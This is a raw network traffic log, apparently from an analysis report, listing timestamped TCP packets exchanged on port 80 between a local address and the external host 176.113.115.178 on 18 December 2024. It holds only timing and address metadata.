                                                        Dec 18, 2024 14:08:27.396095991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.396109104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.396212101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.397229910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.397298098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.397317886 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.398194075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.398253918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.398324966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.399163008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.399221897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.399255991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.400209904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.400224924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.400298119 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.401252985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.401381016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.401411057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.402235985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.402327061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.402367115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.403285980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.403345108 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.403388977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.404444933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.404512882 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.404675961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.405345917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.405415058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.405448914 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.406400919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.406474113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.406486034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.407483101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.407571077 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.407603025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.408503056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.408550024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.408708096 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.409522057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.409584999 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.409590006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.410553932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.410609007 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.410660028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.411580086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.411683083 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.411711931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.412739038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.412796021 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.412894011 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.413641930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.413655043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.413729906 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.414669991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.414730072 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.414769888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.415766001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.415822029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.415838957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.416758060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.416810989 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.416810989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.417747021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.417886972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.417886972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.418791056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.418826103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.418957949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.419856071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.419922113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.419925928 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.420845985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.420950890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.421021938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.421940088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.422027111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.422055960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.422976017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.423019886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.423172951 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.424141884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.424202919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.424242020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.425100088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.425149918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.425170898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.426181078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.426255941 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.426285028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.427155018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.427169085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.427284002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.428085089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.428204060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.428293943 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.429135084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.429241896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.429267883 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.430155039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.430222034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.430298090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.431170940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.431320906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.431323051 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.432264090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.432353020 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.432394028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.433371067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.433383942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.433613062 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.434312105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.434324980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.434485912 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.435345888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.435374022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.435436964 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.436336040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.436377048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.436423063 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.437335014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.437413931 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.437436104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.456013918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.456140041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.456166029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.456511974 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.456603050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.456629038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.457552910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.457602978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.457626104 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.458575010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.458723068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.579391003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.579408884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.579552889 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.579794884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.579922915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.580010891 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.580832005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.581192970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.581254005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.581275940 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.582221985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.582320929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.582325935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.583359957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.583395004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.583522081 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.584307909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.584434986 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.584450006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.585309029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.585494995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.585521936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.586366892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.586406946 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.586430073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.587435961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.587488890 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.587522030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.588411093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.588637114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.588660002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.589487076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.589502096 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.589545965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.590534925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.590653896 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.590692997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.591528893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.591541052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.591727972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.592562914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.592621088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.592670918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.593589067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.593663931 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.593698978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.594713926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.594726086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.594811916 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.595688105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.595702887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.595741034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.596698046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.596739054 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.596801996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.597740889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.597847939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.597867012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.598766088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.598831892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.598865986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.599800110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.599906921 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.599909067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.600856066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.600871086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.600918055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.601907015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.601959944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.601959944 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.602895975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.602966070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.602988005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.604129076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.604140997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.604172945 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.605005980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.605077028 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.605103016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.606059074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.606102943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.606137991 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.607064962 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.607122898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.607137918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.608058929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.608135939 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.608163118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.609082937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.609183073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.609209061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.610111952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.610203028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.610300064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.611123085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.611201048 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.611239910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.612224102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.612293959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.612318039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.613205910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.613307953 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.613337994 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.614275932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.614341021 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.614377022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.615329981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.615343094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.615389109 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.616306067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.616529942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.616533995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.617335081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.617448092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.617479086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.618376017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.618550062 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.618581057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.619370937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.619421959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.619529963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.620439053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.620604992 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.620629072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.621526003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.621586084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.621598959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.622489929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.622576952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.622627020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.623547077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.623614073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.623637915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.624561071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.624675035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.624710083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.625798941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.625812054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.625897884 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.626816034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.626831055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.626857996 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.628130913 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.628212929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.628278971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.629141092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.629209042 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.629247904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.630254030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.630343914 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.648035049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.648128033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.648262978 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.648530960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.648617029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.648670912 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.649372101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.649395943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.649452925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.650377035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.650398016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.650593042 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.771413088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.771476030 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.771555901 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.772043943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.772155046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.772258997 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.772958040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.772974014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.773341894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.774049997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.774121046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.774221897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.774996042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.775258064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.775332928 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.776242018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.776257992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.776451111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.777322054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.777338982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.777424097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.778125048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.778476954 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.778649092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.779196024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.779220104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.779269934 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.780258894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.780411005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.780472040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.781233072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.781335115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.781513929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.782274961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.782289982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.782341957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.783685923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.783701897 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.784044027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.784331083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.784537077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.784615993 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:27.785444021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:27.785633087 CET8049746176.113.115.178192.168.2.10
